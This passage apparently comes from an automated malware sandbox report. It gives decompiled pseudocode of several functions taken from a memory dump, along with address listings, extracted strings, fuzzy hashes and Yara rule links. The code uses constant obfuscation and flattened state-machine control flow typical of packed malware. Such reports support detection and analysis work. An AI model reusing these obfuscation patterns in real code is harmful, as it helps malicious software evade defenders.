				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
				 *(_t382 + 0x34) = 0xd574;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
				 *(_t382 + 0x88) = 0x5832;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
				 *(_t382 + 0x50) = 0x55a1;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
				 *(_t382 + 0x14) = 0xc073;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
				 *(_t382 + 0x94) = 0xf1be;
				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
				_t344 = 0xa;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
				 *(_t382 + 0x60) = 0x96ef;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
				 *(_t382 + 0x38) = 0xec0c;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
				do {
					while(_t376 != 0x3ac0a14) {
						if(_t376 == 0x7fec1df) {
							_t344 = _t382 + 0x2ac;
							E00220D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
							_t382 = _t382 + 0xc;
							_t376 = 0x12c07630;
							continue;
						} else {
							if(_t376 == 0x12c07630) {
								_push( *(_t382 + 0x1c));
								E002129E3(_t382 + 0x2b0, 0x104, E0022889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
								_t344 =  *(_t382 + 0x5c);
								E00222025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
								_t382 = _t382 + 0x30;
								_t376 = 0x3ac0a14;
								continue;
							} else {
								if(_t376 == 0x1f5a6ea2) {
									_t376 = 0x2b635c32;
									continue;
								} else {
									if(_t376 == 0x2b635c32) {
										E00223E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
										_t331 = E002128CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
										_t382 = _t382 + 0xc;
										_t376 = 0x7fec1df;
										_t344 = 0;
										 *_t331 = 0;
										continue;
									} else {
										if(_t376 == 0x2c9ad714) {
											E00224F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
										} else {
											if(_t376 != 0x33ecfade) {
												goto L16;
											} else {
												_t263 = _t380 + 4; // 0xedb0bf04
												E00226CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
												_t382 = _t382 + 0x20;
												_t344 = 1;
												_t376 = 0x2c9ad714;
												_t373 =  !=  ? 1 : _t373;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t373;
					}
					_t325 = E0021B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
					_t337 = _t325;
					_t382 = _t382 + 0x30;
					__eflags = _t325 - 0xffffffff;
					if(__eflags == 0) {
						_t376 = 0x18af80d5;
						goto L16;
					} else {
						_t376 = 0x33ecfade;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t376 - 0x18af80d5;
				} while (__eflags != 0);
				goto L19;
			}

0x002188eb
0x002188f3
0x002188fb
0x00218900
0x00218905
0x0021890d
0x00218915
0x0021891d
0x00218925
0x00218935
0x00218937
0x00218942
0x00218944
0x00218949
0x00218952
0x0021895d
0x00218962
0x0021896a
0x00218972
0x0021897a
0x00218982
0x00218987
0x0021898f
0x0021899c
0x0021899f
0x002189a3
0x002189ab
0x002189b3
0x002189bb
0x002189c3
0x002189cb
0x002189d3
0x002189e3
0x002189e7
0x002189ef
0x002189f7
0x002189ff
0x00218a07
0x00218a0f
0x00218a14
0x00218a1c
0x00218a24
0x00218a2c
0x00218a34
0x00218a3c
0x00218a41
0x00218a46
0x00218a4e
0x00218a5b
0x00218a5c
0x00218a66
0x00218a6a
0x00218a72
0x00218a7a
0x00218a7f
0x00218a84
0x00218a8c
0x00218a94
0x00218a9c
0x00218aa4
0x00218aac
0x00218ab4
0x00218abc
0x00218ac1
0x00218acb
0x00218ad3
0x00218ae8
0x00218ae9
0x00218af0
0x00218afb
0x00218b08
0x00218b0c
0x00218b14
0x00218b1c
0x00218b27
0x00218b2f
0x00218b3a
0x00218b42
0x00218b47
0x00218b4f
0x00218b54
0x00218b5c
0x00218b70
0x00218b77
0x00218b82
0x00218b8a
0x00218b92
0x00218b97
0x00218b9f
0x00218baa
0x00218bb2
0x00218bbd
0x00218bc5
0x00218bcd
0x00218bd2
0x00218bd7
0x00218bdf
0x00218be7
0x00218bf4
0x00218bf8
0x00218c00
0x00218c08
0x00218c10
0x00218c15
0x00218c1a
0x00218c22
0x00218c2a
0x00218c32
0x00218c3a
0x00218c42
0x00218c47
0x00218c51
0x00218c55
0x00218c5d
0x00218c65
0x00218c6d
0x00218c75
0x00218c7d
0x00218c85
0x00218c8d
0x00218c95
0x00218c9d
0x00218cb0
0x00218cb7
0x00218cc2
0x00218cca
0x00218ccf
0x00218cd7
0x00218cdf
0x00218ce7
0x00218cef
0x00218cf4
0x00218cf9
0x00218d01
0x00218d17
0x00218d1e
0x00218d21
0x00218d28
0x00218d33
0x00218d3b
0x00218d43
0x00218d4b
0x00218d53
0x00218d5b
0x00218d68
0x00218d6c
0x00218d71
0x00218d79
0x00218d79
0x00218d8b
0x00218ecd
0x00218ee0
0x00218ee5
0x00218ee8
0x00000000
0x00218d91
0x00218d97
0x00218e4f
0x00218ea1
0x00218eb3
0x00218eb7
0x00218ebc
0x00218ebf
0x00000000
0x00218d9d
0x00218da3
0x00218e45
0x00000000
0x00218da9
0x00218daf
0x00218e17
0x00218e2e
0x00218e33
0x00218e36
0x00218e3b
0x00218e3d
0x00000000
0x00218db1
0x00218db7
0x00218f65
0x00218dbd
0x00218dc3
0x00000000
0x00218dc9
0x00218dd0
0x00218dee
0x00218df5
0x00218df8
0x00218df9
0x00218e00
0x00000000
0x00218e00
0x00218dc3
0x00218db7
0x00218daf
0x00218da3
0x00218d97
0x00218f6b
0x00218f77
0x00218f77
0x00218f30
0x00218f35
0x00218f37
0x00218f3a
0x00218f3d
0x00218f49
0x00000000
0x00218f3f
0x00218f3f
0x00000000
0x00218f3f
0x00000000
0x00218f4e
0x00218f4e
0x00218f4e
0x00000000

Strings

2\c+, xrefs: 00218E45
,, xrefs: 00218C5D
0, xrefs: 00218A6A
Ui=, xrefs: 00218915
EZX-, xrefs: 00218A24
At, xrefs: 00218B5C
2X, xrefs: 00218C9D
Q#JK, xrefs: 002189AB
2\c+, xrefs: 00218DA9

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
API String ID: 2962429428-1096774584
Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction ID: 7eca8a2b7b37740d9ddb7c2021a34403ae2a08e21ec508374f5d432f96e109ca
Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction Fuzzy Hash: 74F110725083809FD368CF65D48A69BFBE1BBC4708F10891DF1DA962A0C7B98959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002226F5, Relevance: 11.5, Strings: 9, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002226F5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __edi;
				void* __ebp;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t202;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				void* _t216;
				void* _t224;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				intOrPtr _t246;
				signed int* _t247;

				_t247 =  &_v88;
				_v12 = 0x29be25;
				_v8 = 0x714c58;
				_t241 = 0;
				_t210 = __edx;
				_v4 = 0;
				_v28 = 0x1199;
				_t246 = __ecx;
				_v28 = _v28 + 0xffffe920;
				_t242 = 0x2efb68f6;
				_v28 = _v28 ^ 0xffffad72;
				_v32 = 0x5bb2;
				_t212 = 0x22;
				_v32 = _v32 / _t212;
				_v32 = _v32 ^ 0x00002aec;
				_v56 = 0xeb34;
				_t213 = 0x1b;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 + 0x2965;
				_v56 = _v56 ^ 0x0061feda;
				_v84 = 0xfe4e;
				_v84 = _v84 + 0xd2a6;
				_v84 = _v84 >> 3;
				_v84 = _v84 | 0x3d0bc2c6;
				_v84 = _v84 ^ 0x3d0bc81e;
				_v20 = 0x5db0;
				_v20 = _v20 + 0xffffd438;
				_v20 = _v20 ^ 0x00005602;
				_v24 = 0xa932;
				_v24 = _v24 * 0x1f;
				_v24 = _v24 ^ 0x00145068;
				_v88 = 0xc29f;
				_v88 = _v88 * 0x34;
				_v88 = _v88 ^ 0xcbbf1de0;
				_v88 = _v88 + 0x67bb;
				_v88 = _v88 ^ 0xcb98f8b4;
				_v36 = 0x7c84;
				_v36 = _v36 + 0x6da7;
				_v36 = _v36 ^ 0x0000df84;
				_v60 = 0xf0d8;
				_v60 = _v60 + 0xffffcb07;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x003a95e0;
				_v44 = 0x6681;
				_v44 = _v44 + 0xffff19d2;
				_v44 = _v44 / _t213;
				_v44 = _v44 ^ 0x097b3a7d;
				_v16 = 0x94d;
				_v16 = _v16 + 0x4187;
				_v16 = _v16 ^ 0x00007836;
				_v48 = 0x21e9;
				_v48 = _v48 ^ 0x3c92a0ae;
				_v48 = _v48 + 0xf596;
				_v48 = _v48 ^ 0x3c9366ad;
				_v52 = 0x4a04;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x56a39f58;
				_v52 = _v52 ^ 0x56bbe121;
				_v80 = 0x166f;
				_v80 = _v80 ^ 0x3bc38db2;
				_v80 = _v80 << 0xd;
				_v80 = _v80 | 0x5d8ccce3;
				_v80 = _v80 ^ 0x7fffd756;
				_v76 = 0xd2e;
				_t214 = 6;
				_v76 = _v76 / _t214;
				_t215 = 0x59;
				_t237 = 0xdd7d922;
				_v76 = _v76 / _t215;
				_v76 = _v76 ^ 0xb1a59fe6;
				_v76 = _v76 ^ 0xb1a5c97b;
				_v40 = 0x2ae1;
				_v40 = _v40 >> 6;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000341b;
				_v64 = 0x37cd;
				_v64 = _v64 + 0xffff3540;
				_v64 = _v64 << 1;
				_v64 = _v64 | 0x66261fef;
				_v64 = _v64 ^ 0xfffeb931;
				_v68 = 0x9ed9;
				_v68 = _v68 + 0xad09;
				_v68 = _v68 ^ 0xfd9e5c2b;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fd99075;
				_v72 = 0x1a2d;
				_v72 = _v72 + 0xc4a4;
				_v72 = _v72 << 6;
				_v72 = _v72 * 0x59;
				_v72 = _v72 ^ 0x135ddffd;
				while(1) {
					L1:
					_t216 = 0x2c1c6573;
					while(_t242 != 0x6072d1c) {
						if(_t242 == _t237) {
							_push(_t216);
							_t199 = E00211132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00212A30);
							_t247 =  &(_t247[9]);
							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
							__eflags = _t199;
							_t216 = 0x2c1c6573;
							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
							L13:
							_t237 = 0xdd7d922;
							continue;
						}
						if(_t242 == 0xe9e2879) {
							_push(_v24);
							_t201 = E00226DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
							_t247 =  &(_t247[5]);
							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
							__eflags = _t201;
							_t202 = 0x303a6ade;
							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
							L12:
							_t216 = 0x2c1c6573;
							goto L13;
						}
						if(_t242 == 0x28cfd81a) {
							return E0021F536(_v64, _v68, _v72, _t241);
						}
						if(_t242 == _t216) {
							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
							_t204 =  *0x22ca24; // 0x0
							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
							 *0x22ca24 = _t241;
							return _t204;
						}
						if(_t242 != 0x2efb68f6) {
							if(_t242 != _t202) {
								L17:
								__eflags = _t242 - 0x35b12720;
								if(__eflags != 0) {
									continue;
								} else {
									return _t202;
								}
								L22:
							} else {
								_t209 = E002176DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
								_t247 =  &(_t247[2]);
								 *((intOrPtr*)(_t241 + 4)) = _t209;
								_t237 = 0xdd7d922;
								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
								goto L1;
							}
						}
						_push(_t216);
						_push(_t216);
						_t224 = 0x38;
						_t208 = E00218736(_t224);
						_t241 = _t208;
						__eflags = _t241;
						if(__eflags != 0) {
							_t242 = 0xe9e2879;
							_t202 = 0x303a6ade;
							goto L12;
						}
						return _t208;
						goto L22;
					}
					E0022422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
					_t242 = 0x28cfd81a;
					_t216 = 0x2c1c6573;
					_t237 = 0xdd7d922;
					goto L17;
				}
			}

0x002226f5
0x002226f8
0x00222700
0x0022270c
0x0022270e
0x00222710
0x00222716
0x0022271e
0x00222720
0x00222728
0x0022272d
0x00222735
0x00222743
0x00222748
0x0022274e
0x00222756
0x00222763
0x00222764
0x00222768
0x00222770
0x00222778
0x00222780
0x00222788
0x0022278d
0x00222795
0x0022279d
0x002227a5
0x002227ad
0x002227b5
0x002227c2
0x002227c6
0x002227ce
0x002227db
0x002227df
0x002227e7
0x002227ef
0x002227f7
0x002227ff
0x00222807
0x0022280f
0x00222817
0x00222824
0x00222828
0x00222830
0x00222838
0x00222846
0x0022284a
0x00222852
0x0022285a
0x00222862
0x0022286a
0x00222872
0x0022287a
0x00222882
0x0022288a
0x00222897
0x0022289b
0x002228a3
0x002228ab
0x002228b3
0x002228bb
0x002228c0
0x002228c8
0x002228d0
0x002228e0
0x002228e5
0x002228ef
0x002228f2
0x002228f7
0x002228fb
0x00222903
0x0022290b
0x00222913
0x00222918
0x0022291d
0x00222925
0x0022292d
0x00222935
0x00222939
0x00222941
0x00222949
0x00222951
0x00222959
0x00222961
0x00222966
0x0022296e
0x00222976
0x0022297e
0x00222988
0x0022298c
0x00222994
0x00222994
0x00222999
0x0022299e
0x002229ac
0x00222a76
0x00222a93
0x00222a98
0x00222a9b
0x00222a9e
0x00222aa5
0x00222aaf
0x00222a3e
0x00222a3e
0x00000000
0x00222a3e
0x002229b8
0x00222a48
0x00222a5a
0x00222a5f
0x00222a62
0x00222a65
0x00222a6c
0x00222a71
0x00222a39
0x00222a39
0x00000000
0x00222a39
0x002229c4
0x00000000
0x00222b0d
0x002229cc
0x00222ae7
0x00222aea
0x00222aef
0x00222af2
0x00000000
0x00222af2
0x002229d8
0x002229dc
0x00222ad9
0x00222ad9
0x00222adf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002229e2
0x002229f1
0x002229f6
0x002229f9
0x00222a03
0x00222a08
0x00000000
0x00222a08
0x002229dc
0x00222a19
0x00222a1a
0x00222a1d
0x00222a1e
0x00222a23
0x00222a27
0x00222a29
0x00222a2f
0x00222a34
0x00000000
0x00222a34
0x00222b15
0x00000000
0x00222b15
0x00222abf
0x00222ac5
0x00222acf
0x00222ad4
0x00000000
0x00222ad4

Strings

XLq, xrefs: 00222700
4, xrefs: 00222756
6x, xrefs: 00222862
!, xrefs: 0022286A
., xrefs: 002228D0
e), xrefs: 00222768
*, xrefs: 0022290B
*, xrefs: 0022274E
}:{, xrefs: 0022284A

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: .$4$6x$XLq$e)$}:{$!$*$*
API String ID: 0-323616845
Opcode ID: 5c1910c396f71ed5500e5a70fe8562dda460d1c94fc823303d95711977163db6
Instruction ID: ebe557a19d58e38ac58fad9cd4c05800f2af96ba5f01b891df1f8accca68757d
Opcode Fuzzy Hash: 5c1910c396f71ed5500e5a70fe8562dda460d1c94fc823303d95711977163db6
Instruction Fuzzy Hash: D5A16272918341EFD368CF65D88940BFBE1FB84718F104A1DF1999A260D3B5CA59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 002263C1, Relevance: 11.4, Strings: 9, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002263C1() {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t166;
				signed int _t167;
				signed int _t168;
				void* _t173;
				void* _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				intOrPtr* _t203;
				signed int _t204;
				signed int* _t205;

				_t205 =  &_v76;
				_v8 = 0x6b5f41;
				_t196 = 0;
				_t173 = 0x1e312b00;
				_v4 = 0;
				_v40 = 0xbf50;
				_v40 = _v40 + 0xffff4d7d;
				_v40 = _v40 ^ 0x1ff0eb0a;
				_v40 = _v40 ^ 0x1ff1e7c7;
				_v68 = 0xcba5;
				_v68 = _v68 + 0xffffed4d;
				_v68 = _v68 >> 9;
				_v68 = _v68 | 0x05a9bf19;
				_v68 = _v68 ^ 0x05a9faf6;
				_v52 = 0xab70;
				_v52 = _v52 + 0xffff3c3f;
				_v52 = _v52 ^ 0x3be47de3;
				_v52 = _v52 ^ 0xc41b8c81;
				_v20 = 0x4c56;
				_t27 =  &_v20; // 0x4c56
				_t197 = 0x53;
				_v20 =  *_t27 / _t197;
				_v20 = _v20 ^ 0x00006ba4;
				_v44 = 0x4e4f;
				_v44 = _v44 + 0xffff1389;
				_v44 = _v44 ^ 0x6e1bb2f9;
				_v44 = _v44 ^ 0x91e4a702;
				_v48 = 0x9b6d;
				_t198 = 0x15;
				_v48 = _v48 / _t198;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x01d9d03e;
				_v16 = 0x7c52;
				_t199 = 0x3a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x0009e5e2;
				_v64 = 0x462a;
				_v64 = _v64 ^ 0x0e1a4a8f;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 ^ 0x000014fb;
				_v72 = 0x5cc4;
				_v72 = _v72 / _t199;
				_v72 = _v72 + 0x2f24;
				_v72 = _v72 + 0xd2bc;
				_v72 = _v72 ^ 0x000179b4;
				_v24 = 0x30ff;
				_t200 = 0x2a;
				_v24 = _v24 / _t200;
				_v24 = _v24 ^ 0x00007cf0;
				_v28 = 0x85cd;
				_v28 = _v28 ^ 0xf8a4d4b8;
				_v28 = _v28 ^ 0xf8a43927;
				_v76 = 0x1878;
				_v76 = _v76 ^ 0x7099aca3;
				_v76 = _v76 ^ 0x4acb853d;
				_v76 = _v76 + 0xffff4ab7;
				_v76 = _v76 ^ 0x3a511503;
				_v32 = 0x1800;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x00002132;
				_v60 = 0xa25b;
				_v60 = _v60 * 0x67;
				_v60 = _v60 + 0x9ac4;
				_v60 = _v60 ^ 0x004180d5;
				_v36 = 0x47a4;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xcd228633;
				_v36 = _v36 ^ 0xcdadbf4b;
				_v12 = 0xe30d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00e3661f;
				_t172 = _v12;
				_t204 = _v12;
				_t201 = _v12;
				_v56 = 0x2740;
				_v56 = _v56 ^ 0x239771de;
				_v56 = _v56 + 0xfffffe7e;
				_v56 = _v56 ^ 0x23985523;
				while(1) {
					L1:
					_t191 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t173 != 0x3fc1d7) {
								if(_t173 == 0x353ab5a) {
									_t202 =  *0x22ca2c; // 0x558300
									_t203 = _t202 + 0x230;
									while( *_t203 != _t191) {
										_t203 = _t203 + 2;
									}
									_t201 = _t203 + 2;
									_t173 = 0x6fcf9e2;
									goto L2;
								} else {
									if(_t173 == 0x6adc8a5) {
										_t167 = E0021F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
										_t205 =  &(_t205[5]);
										_t204 = _t167;
										_t166 = 0xd265085;
										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
										_t191 = 0x5c;
										continue;
									} else {
										if(_t173 == 0x6fcf9e2) {
											_t168 = E00212959(_t173, _v68, _v52, _v20, _v56);
											_t172 = _t168;
											_t205 =  &(_t205[4]);
											if(_t168 != 0) {
												_t173 = 0x6adc8a5;
												goto L1;
											}
										} else {
											if(_t173 == _t166) {
												E0022507B(_v72, _v24, _v28, _v76, _t204);
												_t205 =  &(_t205[3]);
												_t196 =  !=  ? 1 : _t196;
												_t173 = 0x17a504e8;
												while(1) {
													L1:
													_t191 = 0x5c;
													goto L2;
												}
											} else {
												if(_t173 == 0x17a504e8) {
													E00215FB2(_v32, _v60, _t204);
													_t173 = 0x3fc1d7;
													while(1) {
														L1:
														_t191 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t173 != 0x1e312b00) {
														goto L21;
													} else {
														_t173 = 0x353ab5a;
														continue;
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E00215FB2(_v36, _v12, _t172);
							_t173 = 0x26181ebc;
							_t166 = 0xd265085;
							_t191 = 0x5c;
							L21:
						} while (_t173 != 0x26181ebc);
						L22:
						return _t196;
					}
				}
			}

0x002263c1
0x002263c4
0x002263d2
0x002263d4
0x002263d9
0x002263dd
0x002263e5
0x002263ed
0x002263f5
0x002263fd
0x00226405
0x0022640d
0x00226412
0x0022641a
0x00226422
0x0022642a
0x00226432
0x0022643a
0x00226442
0x0022644a
0x00226450
0x00226455
0x0022645b
0x00226463
0x0022646b
0x00226473
0x0022647b
0x00226483
0x0022648f
0x00226494
0x0022649a
0x0022649f
0x002264a7
0x002264b4
0x002264b7
0x002264bb
0x002264c3
0x002264cb
0x002264d3
0x002264d8
0x002264dd
0x002264e5
0x002264f5
0x002264f9
0x00226501
0x00226509
0x00226511
0x0022651d
0x00226520
0x00226524
0x0022652c
0x00226534
0x0022653c
0x00226544
0x0022654c
0x00226554
0x0022655c
0x00226564
0x0022656c
0x00226574
0x00226578
0x00226580
0x0022658d
0x00226591
0x00226599
0x002265a1
0x002265a9
0x002265ae
0x002265b6
0x002265be
0x002265c6
0x002265cb
0x002265d3
0x002265d7
0x002265db
0x002265df
0x002265e7
0x002265ef
0x002265f7
0x002265ff
0x002265ff
0x00226601
0x00226602
0x00226602
0x00226607
0x00000000
0x00226607
0x00226619
0x002266f6
0x002266fc
0x00226707
0x00226704
0x00226704
0x0022670c
0x0022670f
0x00000000
0x0022661f
0x00226625
0x002266d5
0x002266da
0x002266dd
0x002266e6
0x002266eb
0x002266f0
0x00000000
0x0022662b
0x00226631
0x002266a3
0x002266a8
0x002266aa
0x002266af
0x002266b5
0x00000000
0x002266b5
0x00226633
0x00226635
0x00226679
0x00226680
0x00226686
0x00226689
0x002265ff
0x002265ff
0x00226601
0x00000000
0x00226601
0x00226637
0x0022663d
0x0022665b
0x00226661
0x002265ff
0x002265ff
0x00226601
0x00226602
0x00000000
0x00226602
0x0022663f
0x00226645
0x00000000
0x0022664b
0x0022664b
0x00000000
0x0022664b
0x00226645
0x0022663d
0x00226635
0x00226631
0x00226625
0x00000000
0x00226619
0x00226722
0x0022672a
0x0022672f
0x00226734
0x00226735
0x00226735
0x00226741
0x0022674a
0x0022674a
0x00226602

Strings

};, xrefs: 00226432
VLA_k, xrefs: 0022644A
$/, xrefs: 002264F9
@', xrefs: 002265DF
R|, xrefs: 002264A7
ON, xrefs: 00226463
*F, xrefs: 002264C3
A_k, xrefs: 002263C4
2!, xrefs: 00226578

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
API String ID: 0-175875280
Opcode ID: ed752b47194518f409bfd53880ea9752952c54489efb636a933e8e0add203304
Instruction ID: e9b3ad61612a0f67d8b95eb1039f8c8f550355d2f14f2c7ad2c6da721c3bb9d6
Opcode Fuzzy Hash: ed752b47194518f409bfd53880ea9752952c54489efb636a933e8e0add203304
Instruction Fuzzy Hash: 0B817771118381AFD758CF64D49982FBBF1FBD4358F504A1CF686462A0C7B98A58CB83

Uniqueness

Uniqueness Score: -1.00%

Function 00222349, Relevance: 11.4, Strings: 9, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00222349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				void* _t168;
				signed int _t172;
				char _t177;
				signed int _t178;
				void* _t181;
				char* _t186;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t214;

				_push(_a16);
				_push(0x40);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t153);
				_v20 = 0x10;
				_t214 =  &(( &_v80)[6]);
				_v60 = 0xafa2;
				_v60 = _v60 ^ 0xad7cd4b0;
				_t178 = 0;
				_v60 = _v60 | 0x7a339cd1;
				_t181 = 0x15b39dc0;
				_v60 = _v60 ^ 0xff7ff485;
				_v64 = 0xe220;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x618d1066;
				_v64 = _v64 ^ 0x618d4123;
				_v28 = 0xfe94;
				_t206 = 0x17;
				_v28 = _v28 / _t206;
				_v28 = _v28 ^ 0x000043c3;
				_v32 = 0x6fe3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000078b7;
				_v36 = 0x3688;
				_t207 = 0x69;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x00137d17;
				_v24 = 0x8157;
				_v24 = _v24 | 0x6dbfc3a0;
				_v24 = _v24 ^ 0x6dbfb45a;
